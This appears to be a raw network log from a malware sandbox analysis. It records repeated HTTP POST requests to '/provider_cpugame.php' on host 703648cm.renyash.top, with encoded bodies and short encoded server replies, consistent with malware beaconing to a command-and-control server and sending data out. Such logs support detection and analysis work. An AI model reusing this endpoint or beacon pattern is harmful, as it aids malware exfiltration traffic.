                                                                                                                      Date: Fri, 20 Dec 2024 20:17:28 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1f 37 3b 0c 11 24 2c 3a 0f 2b 1d 30 0f 32 59 33 0b 3b 20 2e 17 31 2e 17 5e 2b 3b 04 1b 3d 33 39 5b 26 0a 3d 53 33 04 28 0e 26 24 2b 51 03 10 21 01 24 2d 26 12 24 11 34 53 24 20 3b 01 36 58 3b 1b 35 33 07 0d 23 39 21 54 27 3d 21 1a 3d 3a 21 5b 3d 0a 02 5b 3f 21 23 59 3f 2d 20 52 09 16 26 12 3d 06 1a 54 27 16 06 12 28 3e 23 01 25 01 36 0f 2a 13 00 54 3f 2e 0e 1d 29 3c 23 09 26 0e 0f 04 2a 04 35 5c 31 03 2b 0e 33 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %7;$,:+02Y3; .1.^+;=39[&=S3(&$+Q!$-&$4S$ ;6X;53#9!T'=!=:![=[?!#Y?- R&=T'(>#%6*T?.)<#&*5\1+3(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:30.088712931 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2004
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:30.441862106 CET2004OUTData Raw: 58 5f 5f 53 58 5d 51 55 5a 5b 5b 52 55 53 51 57 58 5e 59 44 52 5c 54 58 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X__SX]QUZ[[RUSQWX^YDR\TX][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"+./)01Y$-%.].79&X)4('=?"#Q%#"1:$.#G!"^,7
                                                                                                                      Dec 20, 2024 21:17:30.496216059 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:30.923456907 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:29 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0f 20 15 3d 0a 27 2c 2d 1a 28 55 33 54 31 2c 3f 40 2f 23 3d 01 24 2d 29 5d 2a 2b 32 56 3f 33 04 06 26 23 2d 57 30 2d 09 52 25 34 2b 51 03 10 22 15 25 3e 3e 58 33 2c 34 56 33 0d 0d 04 20 3d 34 0a 21 23 0c 54 34 2a 25 10 24 3e 04 09 3d 3a 31 10 29 34 37 06 2b 08 2b 1b 29 3d 20 52 09 16 26 1d 2a 38 23 0e 25 3b 3c 51 3c 03 2f 04 26 2b 2d 18 29 13 3e 10 28 3d 2c 52 3d 01 15 0e 26 23 21 04 29 2a 3e 06 26 03 20 51 24 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: & =',-(U3T1,?@/#=$-)]*+2V?3&#-W0-R%4+Q"%>>X3,4V3 =4!#T4*%$>=:1)47++)= R&*8#%;<Q</&+-)>(=,R=&#!)*>& Q$&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:30.925278902 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:31.270046949 CET2220OUTData Raw: 58 5c 5a 53 5d 5f 54 53 5a 5b 5b 52 55 5e 51 53 58 58 59 44 52 53 54 5c 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X\ZS]_TSZ[[RU^QSXXYDRST\][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!B)/X?02$.Y9+4&(7+Z';)S(2&;,"!T'#G!"^,
                                                                                                                      Dec 20, 2024 21:17:31.333606958 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:32.047070980 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:30 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 55 20 15 36 57 26 2c 31 56 3c 0a 30 09 25 2f 27 09 38 56 2a 5c 26 00 18 07 3f 2b 31 0a 3f 30 32 03 32 1d 36 0e 24 03 38 0f 25 1e 2b 51 03 10 21 04 31 2e 26 5e 30 11 24 10 24 0a 38 5e 21 2e 28 09 21 33 00 1e 20 3a 22 0e 33 58 25 56 2a 3a 29 5b 29 0a 3f 04 3f 08 27 15 3d 2d 20 52 09 16 26 55 3e 38 16 13 24 3b 34 51 28 13 38 5d 25 16 00 0e 3d 04 32 57 3f 3e 0e 52 2a 3f 20 53 25 30 35 05 29 39 25 5e 25 14 37 0f 27 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %U 6W&,1V<0%/'8V*\&?+1?0226$8%+Q!1.&^0$$8^!.(!3 :"3X%V*:)[)??'=- R&U>8$;4Q(8]%=2W?>R*? S%05)9%^%7'(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:32.049681902 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:32.395031929 CET2220OUTData Raw: 58 58 5f 55 58 5d 51 57 5a 5b 5b 52 55 55 51 55 58 59 59 42 52 5d 54 5d 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XX_UX]QWZ[[RUUQUXYYBR]T]][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!*X(>3%$..+97:>?\$;=S(!$2+<Y5W)'#G!"^,/
                                                                                                                      Dec 20, 2024 21:17:32.456074953 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:33.167135000 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:31 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 57 23 2b 29 0e 24 06 25 18 2b 20 2b 1f 32 3f 3b 41 38 56 31 07 32 07 21 14 28 3b 3e 50 3d 1d 0b 5e 24 20 35 57 24 3d 09 10 32 0e 2b 51 03 10 21 04 24 3e 2e 58 33 01 2c 57 27 23 02 1b 36 00 37 1d 36 30 3a 1c 21 2a 39 53 27 58 2e 0f 3e 39 08 06 2a 1d 34 5a 2a 22 2b 14 3d 2d 20 52 09 16 25 0d 2a 01 3b 0f 24 16 01 0f 29 2d 0e 17 32 5e 32 08 3e 3d 2a 56 28 3e 20 54 3e 3c 24 53 24 30 22 5c 2a 04 2e 03 31 2a 06 19 33 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %W#+)$%+ +2?;A8V12!(;>P=^$ 5W$=2+Q!$>.X3,W'#6760:!*9S'X.>9*4Z*"+=- R%*;$)-2^2>=*V(> T><$S$0"\*.1*38&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:33.168375969 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:33.520263910 CET2220OUTData Raw: 5d 5c 5a 57 58 5c 54 57 5a 5b 5b 52 55 5e 51 53 58 53 59 40 52 54 54 55 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]\ZWX\TWZ[[RU^QSXSY@RTTU][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!B)-7Z)3!\0",+27Z)78%(!+T#Q2;+5)0#G!"^,
                                                                                                                      Dec 20, 2024 21:17:33.575042009 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:34.292088985 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:32 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1e 20 02 35 0d 27 01 0b 52 3c 30 34 0d 26 3c 30 1a 2c 30 35 05 31 00 2a 07 2b 38 31 08 3f 33 39 58 24 33 22 0b 27 5b 24 0b 31 24 2b 51 03 10 21 01 31 04 2d 01 27 2f 01 0d 30 55 2c 14 36 3e 34 43 23 20 25 0c 37 07 00 0c 24 07 31 1b 28 39 2d 13 3e 1d 2b 06 28 31 05 14 3f 3d 20 52 09 16 26 1f 28 2b 38 50 27 2b 24 57 2b 3e 3f 05 26 5e 21 52 2a 13 26 1d 2b 58 38 1d 3d 3c 38 52 32 0e 0c 11 3e 04 35 17 25 3a 09 0a 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: % 5'R<04&<0,051*+81?39X$3"'[$1$+Q!1-'/0U,6>4C# %7$1(9->+(1?= R&(+8P'+$W+>?&^!R*&+X8=<8R2>5%:'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:34.293745995 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:34.644938946 CET2204OUTData Raw: 58 51 5f 51 58 5b 54 53 5a 5b 5b 52 55 57 51 53 58 5f 59 45 52 55 54 5a 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XQ_QX[TSZ[[RUWQSX_YERUTZ][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\")'* :$.6Y9- "X)8')S?1$%+,Z")3>#G!"^,?
                                                                                                                      Dec 20, 2024 21:17:34.700458050 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:35.417982101 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:33 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 55 20 05 31 0e 30 11 03 51 3f 30 2b 50 24 3c 27 44 2c 20 2a 59 25 00 35 5f 3f 05 25 09 3d 20 39 12 24 33 07 56 25 2d 2b 53 31 34 2b 51 03 10 22 59 25 3e 2d 06 33 2f 28 53 27 20 30 58 22 58 20 40 22 23 3e 54 37 5f 3d 10 30 3e 31 53 29 3a 29 5f 29 24 06 5d 28 1f 28 06 3d 07 20 52 09 16 26 1c 3e 3b 3f 0e 30 06 34 55 3c 3d 0d 07 32 38 3e 09 3d 3d 29 0c 2b 3e 20 1f 2b 2f 37 0f 31 23 32 5a 28 39 39 5a 25 2a 01 08 30 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %U 10Q?0+P$<'D, *Y%5_?%= 9$3V%-+S14+Q"Y%>-3/(S' 0X"X @"#>T7_=0>1S):)_)$]((= R&>;?04U<=28>==)+> +/71#2Z(99Z%*0&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:35.418946028 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:35.769962072 CET2220OUTData Raw: 58 5d 5f 55 58 5d 54 53 5a 5b 5b 52 55 54 51 51 58 5e 59 41 52 55 54 55 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X]_UX]TSZ[[RUTQQX^YARUTU][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!B='[>3[$!:49=) %8?1;1'!W6$#G!"^,+
                                                                                                                      Dec 20, 2024 21:17:35.829335928 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:36.549071074 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:34 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0d 21 3b 3e 52 27 2c 25 51 3f 0a 33 1f 32 11 33 08 38 09 3d 06 26 58 29 58 3f 38 36 57 3e 1d 31 59 25 1d 2a 0a 30 04 2f 52 26 0e 2b 51 03 10 22 16 25 3d 39 01 24 11 06 1f 30 33 27 05 21 2e 3f 1a 22 55 25 0e 23 00 3e 0f 33 3d 31 18 29 17 2a 02 3e 1d 20 5a 3f 22 28 00 3e 07 20 52 09 16 26 54 2a 28 1a 13 25 28 0e 54 2b 2d 20 1a 32 3b 21 1a 29 03 0b 0c 28 3e 02 53 3d 11 33 0a 26 0e 2a 13 3d 39 3a 03 25 03 37 0f 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &!;>R',%Q?3238=&X)X?86W>1Y%*0/R&+Q"%=9$03'!.?"U%#>3=1)*> Z?"(> R&T*(%(T+- 2;!)(>S=3&*=9:%7'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:36.598542929 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:37.005177021 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:37.506726027 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:35 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0e 37 05 0c 56 30 06 3d 1a 2b 0d 20 0c 31 2f 27 44 38 33 32 5f 26 00 1b 59 3c 5d 22 1b 3f 33 2e 07 26 33 25 1f 30 3d 2c 0c 26 0e 2b 51 03 10 22 14 32 13 21 02 26 2f 0d 0e 30 0d 0e 5f 35 07 38 0a 36 0a 3a 13 37 17 3d 1e 24 2e 31 1a 3e 39 35 5a 29 24 28 5c 3f 0f 23 1b 3e 3d 20 52 09 16 25 0f 3d 2b 3c 57 27 28 38 57 2b 3d 2c 5c 31 38 07 56 2a 03 0f 0e 2b 2d 20 56 2b 2f 1a 51 32 56 31 05 3e 5c 39 5f 31 03 20 52 27 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &7V0=+ 1/'D832_&Y<]"?3.&3%0=,&+Q"2!&/0_586:7=$.1>95Z)$(\?#>= R%=+<W'(8W+=,\18V*+- V+/Q2V1>\9_1 R'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:37.514307022 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:37.920780897 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:38.644603968 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:36 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 52 20 5d 29 0a 33 2f 04 09 2b 0d 33 12 25 01 2b 44 2e 33 32 5c 25 3e 3d 58 3c 05 35 0e 2a 33 2d 5a 32 1d 3e 0d 27 3e 28 0a 26 1e 2b 51 03 10 22 14 24 3d 00 12 33 2c 30 54 26 23 0a 58 22 3e 2c 08 35 0d 2e 50 37 39 08 0c 33 10 29 50 3e 17 00 00 3d 0a 28 5e 2b 21 24 01 3d 07 20 52 09 16 25 0d 3e 06 3c 51 27 38 28 1c 28 2d 01 06 32 38 22 08 29 2e 3e 53 3c 3e 2c 1f 3e 3f 38 57 25 09 3e 1e 3e 04 29 5a 25 2a 34 1a 27 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %R ])3/+3%+D.32\%>=X<5*3-Z2>'>(&+Q"$=3,0T&#X">,5.P793)P>=(^+!$= R%><Q'8((-28").>S<>,>?8W%>>)Z%*4'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:38.645658016 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:39.052202940 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:39.486443043 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:37 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 53 21 2b 35 0d 24 59 2e 08 29 23 38 09 25 2c 2f 41 2e 33 3e 5d 32 3e 26 05 2a 3b 3e 56 3d 33 26 06 26 23 35 54 33 3d 27 1f 26 1e 2b 51 03 10 22 14 26 3d 31 06 33 06 34 54 30 1d 02 15 22 10 0e 41 35 33 03 0c 21 39 21 55 33 00 3d 51 2a 39 07 5f 3d 1a 2c 5a 2a 21 33 1b 29 07 20 52 09 16 26 57 28 3b 34 13 30 38 05 0c 29 3d 2c 1a 26 3b 2d 52 28 2e 29 0e 28 3e 28 1f 2a 11 19 0b 24 30 21 03 3e 39 35 5b 31 3a 0a 52 26 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %S!+5$Y.)#8%,/A.3>]2>&*;>V=3&&#5T3='&+Q"&=134T0"A53!9!U3=Q*9_=,Z*!3) R&W(;408)=,&;-R(.)(>(*$0!>95[1:R&(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:39.498042107 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:39.904859066 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:40.633101940 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:38 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0f 23 05 35 0d 33 01 00 0f 3f 33 30 0e 32 11 2b 44 2e 20 2d 00 31 3d 36 04 3f 3b 25 0e 2a 23 2a 07 31 0d 22 0d 33 3d 01 1f 26 34 2b 51 03 10 22 59 32 04 26 58 33 06 23 0f 24 23 28 16 22 2e 2c 08 21 1d 08 56 20 39 21 52 27 2e 25 18 29 00 21 10 3e 1d 3f 07 3f 0f 37 5c 29 07 20 52 09 16 25 0c 3d 01 37 0c 30 01 28 1c 2b 2d 3f 04 26 16 03 1b 3d 2d 03 0e 3f 3e 28 54 29 2f 3b 0e 32 1e 2e 58 29 39 22 05 26 14 3c 50 24 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &#53?302+D. -1=6?;%*#*1"3=&4+Q"Y2&X3#$#(".,!V 9!R'.%)!>??7\) R%=70(+-?&=-?>(T)/;2.X)9"&<P$&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:40.669040918 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:41.076971054 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:41.797334909 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:39 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 54 37 05 03 0a 24 11 26 0f 3f 1d 06 0d 31 3c 27 40 3b 23 36 1a 32 58 29 17 2b 2b 2a 18 3e 30 2d 58 24 20 21 56 25 2d 2c 0f 26 1e 2b 51 03 10 22 14 31 04 22 13 27 01 20 1f 27 55 24 15 36 58 20 43 36 30 3e 57 20 07 08 0f 25 2e 3e 09 3e 39 21 59 29 24 24 5f 28 0f 05 59 3e 07 20 52 09 16 26 55 29 06 3c 1d 24 06 24 50 2b 2d 28 59 25 2b 36 0a 2a 03 0f 0c 3f 00 0a 10 2a 2f 28 57 26 23 29 01 3e 14 2a 06 31 2a 23 08 33 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %T7$&?1<'@;#62X)++*>0-X$ !V%-,&+Q"1"' 'U$6X C60>W %.>>9!Y)$$_(Y> R&U)<$$P+-(Y%+6*?*/(W&#)>*1*#38&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:41.801605940 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:42.211211920 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:42.936233044 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:41 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0f 37 3b 26 1f 33 2f 03 1a 28 20 2c 0e 32 01 23 45 2f 1e 35 06 31 3e 14 00 3c 3b 2e 51 29 33 25 10 31 33 3e 0b 27 3d 2c 0f 26 34 2b 51 03 10 21 06 24 2d 39 00 30 11 0e 1e 27 55 33 04 22 2e 38 45 21 20 25 09 34 2a 3d 1d 30 2e 32 0b 29 00 2a 07 3e 1d 3c 16 3f 08 34 04 3d 17 20 52 09 16 25 08 3e 16 24 50 27 38 0e 1d 28 5b 24 14 31 38 07 57 2a 03 0c 52 2b 00 27 0e 3d 06 38 14 24 20 21 03 29 14 35 5b 32 3a 0a 52 27 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &7;&3/( ,2#E/51><;.Q)3%13>'=,&4+Q!$-90'U3".8E! %4*=0.2)*><?4= R%>$P'8([$18W*R+'=8$ !)5[2:R'8&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:42.942213058 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:43.349756956 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:44.070842981 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:42 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
